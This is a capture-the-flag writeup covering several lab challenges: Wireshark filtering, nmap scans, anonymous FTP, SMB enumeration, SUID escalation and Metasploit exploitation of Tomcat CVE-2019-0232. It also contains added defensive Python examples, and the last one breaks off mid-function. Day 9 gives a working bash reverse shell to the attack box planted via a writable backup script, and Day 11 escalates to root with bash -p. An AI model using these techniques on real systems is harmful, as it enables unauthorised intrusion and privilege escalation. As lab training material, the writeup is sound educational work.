Since the first post is already getting very long, I am splitting the writeup into multiple posts, grouped by topic.

You can already read the web exploitation part.

Day 7 – The Grinch Really Did Steal Christmas

For this challenge we do not need the attack box. We download the pcaps, and if we do not already have Wireshark installed, we will have to get that too.

For the first task we open the first pcap and type icmp into the filter bar to only see ICMP packets.

To see only the HTTP GET requests, we use the filter bar again, this time with http.request.method == "GET".

For the next question we filter for the requested IP and HTTP requests at the same time: ip.addr == 10.10.67.199 && http.request. Note that http.request matches every request method; adding && http.request.method == "GET" narrows it down to GETs only.

Looking through the requested URIs should give us a good hint of what article he was searching for.

Next we open the second pcap and use the filter once more. ftp narrows the packets down enough.

To find the encrypted protocol, we click the Protocol column header to sort by it and scroll through the list. The odd one out is quick to spot.

For the last task we open the third pcap. HTTP is often used for file transfer, so we filter for http.

Then we select the response and go to File->Export Objects->HTTP. In the dialog we can select and save the .zip file.

In that zip we will find the wishlist and with it the final answer.
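What those three filters and the export step actually do is easy to see on raw packets. The following is an added example, not part of the original writeup: a standard-library-only pcap reader that applies the equivalent of icmp, http.request.method == "GET" && ip.addr == X and Export Objects -> HTTP to a capture constructed in memory. Everything except the address 10.10.67.199 from the task (the other hosts, the URI, the zip bytes) is made up, and it assumes Ethernet frames with one HTTP message per TCP segment; Wireshark reassembles TCP streams first, which this deliberately does not.

```python
"""Added example: stdlib-only pcap reader reproducing the Wireshark filters
icmp, http.request.method == "GET", ip.addr == X and Export Objects -> HTTP.
Assumes Ethernet frames and one HTTP message per TCP segment (no reassembly).
IP/TCP checksums are left at zero; the parser never verifies them."""
import struct

ETH_IPV4 = 0x0800
PROTO_ICMP, PROTO_TCP = 1, 6


def ip2bytes(dotted):
    return bytes(int(o) for o in dotted.split("."))


def build_packet(src, dst, proto, payload, sport=0, dport=0):
    """Ethernet + IPv4 + (ICMP echo request | TCP PSH/ACK) frame (constructed)."""
    if proto == PROTO_ICMP:
        l4 = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload
    else:  # data offset 5 words, flags PSH|ACK, window 8192
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     ip2bytes(src), ip2bytes(dst)) + l4
    return b"\x02" * 12 + struct.pack("!H", ETH_IPV4) + ip


def build_pcap(frames):
    """Classic pcap: 24-byte global header (linktype 1 = Ethernet), 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1607817600 + i, 0, len(f), len(f)) + f
    return out


def parse_pcap(data):
    """Yield one dict per IPv4 packet with the fields the filters need."""
    pos = 24
    while pos + 16 <= len(data):
        incl = struct.unpack_from("<IIII", data, pos)[2]
        frame = data[pos + 16:pos + 16 + incl]
        pos += 16 + incl
        if struct.unpack_from("!H", frame, 12)[0] != ETH_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4                  # IPv4 header length
        pkt = {"proto": frame[23], "payload": b"",    # protocol byte at IP offset 9
               "src": ".".join(map(str, frame[26:30])),
               "dst": ".".join(map(str, frame[30:34]))}
        l4 = frame[14 + ihl:]
        if pkt["proto"] == PROTO_TCP:
            pkt["sport"], pkt["dport"] = struct.unpack_from("!HH", l4)
            pkt["payload"] = l4[(l4[12] >> 4) * 4:]   # skip TCP header incl. options
        yield pkt


def http_request_line(pkt):
    """(method, uri) if the payload starts with an HTTP request line, else None."""
    parts = pkt["payload"].split(b"\r\n", 1)[0].split(b" ")
    if len(parts) == 3 and parts[2].startswith(b"HTTP/"):
        return parts[0].decode(), parts[1].decode()
    return None


def filter_icmp(pkts):
    """Wireshark: icmp"""
    return [p for p in pkts if p["proto"] == PROTO_ICMP]


def filter_http_get(pkts, host=None):
    """Wireshark: http.request.method == "GET" [&& ip.addr == host]; returns (src, uri)."""
    out = []
    for p in pkts:
        req = http_request_line(p)
        if req and req[0] == "GET" and (host is None or host in (p["src"], p["dst"])):
            out.append((p["src"], req[1]))
    return out


def export_http_objects(pkts):
    """File -> Export Objects -> HTTP: (content-type, body) of each response."""
    objs = []
    for p in pkts:
        if not p["payload"].startswith(b"HTTP/1."):
            continue
        head, _, body = p["payload"].partition(b"\r\n\r\n")
        ctype = [h.split(b":", 1)[1].strip().decode() for h in head.split(b"\r\n")
                 if h.lower().startswith(b"content-type:")]
        objs.append((ctype[0] if ctype else "", body))
    return objs


# Constructed capture: a ping, a GET, the zip coming back, and a POST from another host.
SAMPLE_PCAP = build_pcap([
    build_packet("10.10.67.199", "10.10.10.1", PROTO_ICMP, b"ping"),
    build_packet("10.10.67.199", "10.10.10.1", PROTO_TCP,
                 b"GET /articles/constructed-example HTTP/1.1\r\nHost: example\r\n\r\n", 40000, 80),
    build_packet("10.10.10.1", "10.10.67.199", PROTO_TCP,
                 b"HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04", 80, 40000),
    build_packet("10.10.10.2", "10.10.10.1", PROTO_TCP,
                 b"POST /login HTTP/1.1\r\nHost: example\r\n\r\n", 40001, 80),
])
PACKETS = list(parse_pcap(SAMPLE_PCAP))
```

After import, PACKETS holds the four decoded packets and filter_http_get(PACKETS, "10.10.67.199") is the Day 7 question in code. The plain http.request filter in Wireshark matches every method, which is why filter_http_get checks the method explicitly.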

Day 8 – What’s Under the Christmas Tree?

For this day we are back on our beloved attack box. Deploy it and the challenge. While they load, spend some time googling the first question; Wikipedia is a good source for the answer 😉

Now we scan the deployed box with nmap.

nmap 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3389/tcp open  ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds

The challenge wants us to experiment a bit with the -Pn, -sV and -A flags, and we do so. This should help us find the OS of the system, too. Note that the plain scan above labels port 2222 as EtherNetIP-1 only because that is the name nmap's services file lists for that port number; it takes -sV to actually probe the service and reveal the SSH server listening there.

I like to add -v to my nmap scans for more verbose output.

nmap -sV -v 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open  ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)

For the next task we are supposed to run the http-title script (nmap --script http-title). That script was already part of our experiments with -A, which enables the default script set.

This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day, and you really should take the opportunity to play around a bit with nmap here.

Day 9 – Anyone can be Santa!

Today is all about FTP so let’s get the attack box and the challenge deployed.

First we connect to the server via ftp and have a look. We do not have credentials yet, so we log in as anonymous. With ls we can list the directory contents, just like in a terminal.

There is only one folder we can access as anonymous. We cd into it, then run ls again to see its content.

There are two files, and we can download them to our attack box with get filename. Locally we open the shopping list first and answer question 3.

Now it is time to open up the script in an editor.

#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";

# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp

# TO-DO: Automate transfer of backups to backup server

It is a backup script that absolutely should not be in a public folder, and we even have permission to upload into that folder. Whatever we put in place of the script will run with the privileges of whoever executes the backup.

We replace its contents with a simple bash reverse shell and save it:

#!/bin/bash
bash -i >& /dev/tcp/10.10.214.41/4444 0>&1

The IP in there needs to be your attack box IP, not the one of the challenge machine.

Before we upload the modified script, we need to set up a listener for the reverse shell. nc -lvnp 4444 does the trick.

Now we can upload the script with put in ftp.

After a minute or two, we should get a connection on our listener.

With cat /root/flag.txt we read our final flag.

Day 10: Don’t be so sElfish

As always we deploy the attack box and the challenge. First we run enum4linux with -U to enumerate users.

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================== 
|    Users on 10.10.180.212    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy    Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager    Name: elfmceagerDesc: 
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson    Name:   Desc: 

user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020

This gives us the users. Now we also enumerate the shares:

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 10.10.180.212    |
 ========================================== 
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    tbfc-hr         Disk      tbfc-hr
    tbfc-it         Disk      tbfc-it
    tbfc-santa      Disk      tbfc-santa
    IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    TBFC-SMB-01          TBFC-SMB

[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa    Mapping: OK, Listing: OK
//10.10.180.212/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020

The output shows us that tbfc-santa could be mapped without credentials. Let's connect to that share with an empty password, for example smbclient //10.10.180.212/tbfc-santa -N. With dir we list the content and should have all the information to finish the tasks.

Day 11 – The Rogue Gnome

We start the attack box and the challenge. While they boot, we read the documentation in the challenge and answer the first two questions.

Then we SSH into the box with the provided credentials: ssh cmnatic@10.10.154.38. On the first connection you will have to confirm the server's fingerprint.

With find / -perm -u=s -type f 2>/dev/null we search for binaries that have the SUID bit set, meaning they execute with the permissions of the file's owner instead of the user who starts them. The 2>/dev/null hides the permission-denied errors from directories we cannot read.

-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine

/bin/bash looks like a very promising candidate. Let's check its permissions.

-bash-4.4$ ls -la /bin/bash 
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-bash-4.4$ 

The s in the owner's execute position together with root as owner means it runs as root. We will do just that with bash -p. The -p flag matters: without it bash notices that the effective user ID differs from the real one and drops the privileges again.

Now we can cat the flag file.
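Both Day 9 and Day 11 come down to file permission bits: a script anyone can overwrite but a privileged job executes, and a binary with the SUID bit that runs as its owner. As an added example that is not part of the writeup, the audit below walks a directory tree and flags both, the way a defender would check a box before the Grinch does. The directory layout is a constructed fixture built in a temporary directory; nothing is read from the real system.

```python
"""Added example, not from the writeup: audit a directory tree for the two
misconfigurations behind Day 9 and Day 11. A script that is writable by group
or world but executed by a privileged job (Day 9's backup.sh) lets anyone who
can write it run code as that job; a SUID/SGID file (Day 11's /bin/bash) runs
with its owner's privileges. The fixture below is constructed in a temp dir."""
import os
import shutil
import stat
import tempfile


def classify(mode):
    """Labels an st_mode earns: 'setuid' (what find / -perm -u=s matches, plus the
    setgid bit) and 'writable_exec' (executable by anyone, writable by group or others)."""
    labels = set()
    if mode & (stat.S_ISUID | stat.S_ISGID):
        labels.add("setuid")
    executable = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if executable and mode & (stat.S_IWGRP | stat.S_IWOTH):
        labels.add("writable_exec")
    return labels


def audit_tree(root):
    """Walk root without following symlinks (like find -type f) and bucket regular
    files by the labels classify() gives them; the value is the ls -l style mode."""
    findings = {"setuid": {}, "writable_exec": {}}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            for label in classify(st.st_mode):
                findings[label][path] = stat.filemode(st.st_mode)
    return findings


def build_fixture(base):
    """Constructed layout: an anonymous-FTP folder holding a 0777 backup script and
    harmless files, plus a fake SUID 'bash' owned by whoever runs this script."""
    pub = os.path.join(base, "opt", "ftp", "pub")
    bindir = os.path.join(base, "bin")
    os.makedirs(pub)
    os.makedirs(bindir)
    layout = {
        os.path.join(pub, "backup.sh"): 0o777,          # what Day 9 exploits
        os.path.join(pub, "shopping_list.txt"): 0o644,
        os.path.join(pub, "helper.sh"): 0o755,          # executable but only owner-writable
        os.path.join(bindir, "bash"): 0o4755,           # what Day 11 exploits
    }
    for path, mode in layout.items():
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(path, mode)
    return layout


def demo():
    """Build the fixture, audit it, return {label: sorted basenames}."""
    base = tempfile.mkdtemp(prefix="audit-")
    try:
        build_fixture(base)
        found = audit_tree(base)
        return {label: sorted(os.path.basename(p) for p in paths)
                for label, paths in found.items()}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for label, names in demo().items():
        print(label, names)
```

classify() is the bit test find -perm -u=s performs, extended to the setgid bit and to the group/world-writable-plus-executable combination that made backup.sh exploitable. Running the file prints both findings; the SUID entry only shows up if the filesystem keeps the bit when a normal user sets mode 4755, which the common ones do.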

Day 12: Ready, set, elf.

After deploying the boxes we run a quick nmap scan to get an overview:

root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
8080/tcp open  http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/13%Time=5FD5EBF5%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2000,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;char
SF:set=UTF-8\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:53\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\n\r\n\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20l
SF:ang=\"en\">\r\n\x20\x20\x20\x20<head>\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<meta\x20charset=\"UTF-8\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:title>Apache\x20Tomcat/9\.0\.17</title>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<link\x20href=\"favicon\.ico\"\x20rel=\"icon\"\x20type=\"image/x-ic
SF:on\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"favicon\.
SF:ico\"\x20rel=\"shortcut\x20icon\"\x20type=\"image/x-icon\"\x20/>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"tomcat\.css\"\x20rel=\"sty
SF:lesheet\"\x20type=\"text/css\"\x20/>\r\n\x20\x20\x20\x20</head>\r\n\r\n
SF:\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\"
SF:wrapper\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20i
SF:d=\"navigation\"\x20class=\"curved\x20container\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"nav-home\"
SF:><a\x20href=\"https://tomcat\.apache\.org/\">Home</a></span>\r\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"
SF:nav-hosts\"><a\x20href=\"/docs/\">Documentation</a></span>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"na
SF:v-config\"><a\x20href=\"/docs/config/\">Configuration</a></span>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20i
SF:d=\"nav-examples\"><a\x20href=\"/examples/\">Examples")%r(HTTPOptions,7
SF:D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HEAD,\x20POST,\x20OPTIONS\
SF:r\nContent-Length:\x200\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:
SF:54\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,8CB,"HTTP/1\.
SF:1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x202114\r\nDate:\x20Sun,\x2013\x20Dec\x
SF:202020\x2010:24:54\x20GMT\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"
SF:><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\
SF:x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-si
SF:ze:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;font-size:16px;}\x20h3\x20{font-family:Tahoma,Ari
SF:al,sans-serif;color:white;background-color:#525D76;font-size:14px;}\x20
SF:body\x20{font-family:Tahoma,Arial,sans-serif;color:black;background-col
SF:or:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sans-serif;ba
SF:ckground:white;color:black;font-size:12px;}\x20a\x20{color:black;}\x20a
SF:\.name\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525
SF:D76;border:none;}</style></head><body><h");
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
           Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)

Looks like there is a web server running on port 8080. Let's look at it by pulling it up in the browser.

Here we can see what version of Tomcat is running; the nmap fingerprint above already leaked it in the page title, Apache Tomcat/9.0.17. Now we start Metasploit with msfconsole.

search tomcat lists a number of exploits Metasploit provides for Tomcat. info path lets us view the details of an exploit.

The one that seems promising is exploit/windows/http/tomcat_cgi_cmdlineargs:

msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs

       Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
     Module: exploit/windows/http/tomcat_cgi_cmdlineargs
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-10

Provided by:
  Yakov Shafranovich
  sinn3r <sinn3r@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Apache Tomcat 9.0 or prior for Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path to CGI script
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Apache Tomcat's CGIServlet 
  component. When the enableCmdLineArguments setting is set to true, a 
  remote user can abuse this to execute system commands, and gain 
  remote code execution.

References:
  https://cvedetails.com/cve/CVE-2019-0232/
  
Remote Code Execution (RCE) in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232
https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/

We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs

options shows us the available settings for this exploit. First we double-check that LHOST is our attack box IP.

Then we set the target to the server's IP. The option is called RHOSTS in the listing above: set RHOSTS 10.10.83.199

Now we need a CGI script to target. Following the challenge description we find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat. We use set TARGETURI /cgi-bin/elfwhacker.bat and double-check our options.

When everything is fine, we issue exploit to start the attack.

We now have a Meterpreter session on the server. With dir we can list the directory content.

meterpreter > dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2020-12-13 10:56:07 +0000  cyGMM.exe
100777/rwxrwxrwx  825    fil   2020-11-19 03:49:25 +0000  elfwhacker.bat
100666/rw-rw-rw-  27     fil   2020-11-19 22:05:43 +0000  flag1.txt

We can cat the flag file and finish the challenge. The randomly named cyGMM.exe next to it, timestamped at the moment of our exploit run, is the payload Metasploit dropped on disk, exactly the artifacts-on-disk side effect the module info warned about. There is more to explore here, and you should use the opportunity to play around with Metasploit and privilege escalation.
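Since the module info explains the bug in a single sentence, here is an added example (not part of the writeup or of Metasploit) showing what the exploit looks like from the defender's side: a small detector over Tomcat access-log lines. The log lines are constructed; the paths match the elfwhacker.bat target used above, and the detection rule follows the CGI rule for query strings without '=' described in the code comments.

```python
"""Added example, not from the writeup: detection for CVE-2019-0232 style requests
in a Tomcat access log. With enableCmdLineArguments=true, CGIServlet follows the
CGI rule (RFC 3875 section 4.4): a query string without '=' is split on '+' and
passed to the script as command-line arguments, and on Windows cmd.exe treats
'&' in those arguments as a command separator. Log lines below are constructed."""
import re
from urllib.parse import unquote, urlsplit

# Tomcat AccessLogValve "common" pattern: host ident user [date] "method target proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

# cmd.exe metacharacters that start a second command or redirect output
CMD_META = re.compile(r"[&|<>^]")


def parse_line(line):
    """Return the interesting fields of one access-log line, or None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    return {"client": client, "ts": ts, "method": method, "target": target, "status": int(status)}


def is_cgi_cmd_injection(target):
    """True when the request targets a .bat/.cmd under cgi-bin with an 'indexed' query
    (no '=' in the raw query) whose decoded form carries a cmd.exe metacharacter."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if "/cgi-bin/" not in path or not path.endswith((".bat", ".cmd")):
        return False
    if not parts.query or "=" in parts.query:
        return False                      # name=value queries never become argv
    decoded = unquote(parts.query.replace("+", " "))
    return CMD_META.search(decoded) is not None


def detect(lines):
    """(client, target, status) for every line that looks like an injection attempt."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_cgi_cmd_injection(rec["target"]):
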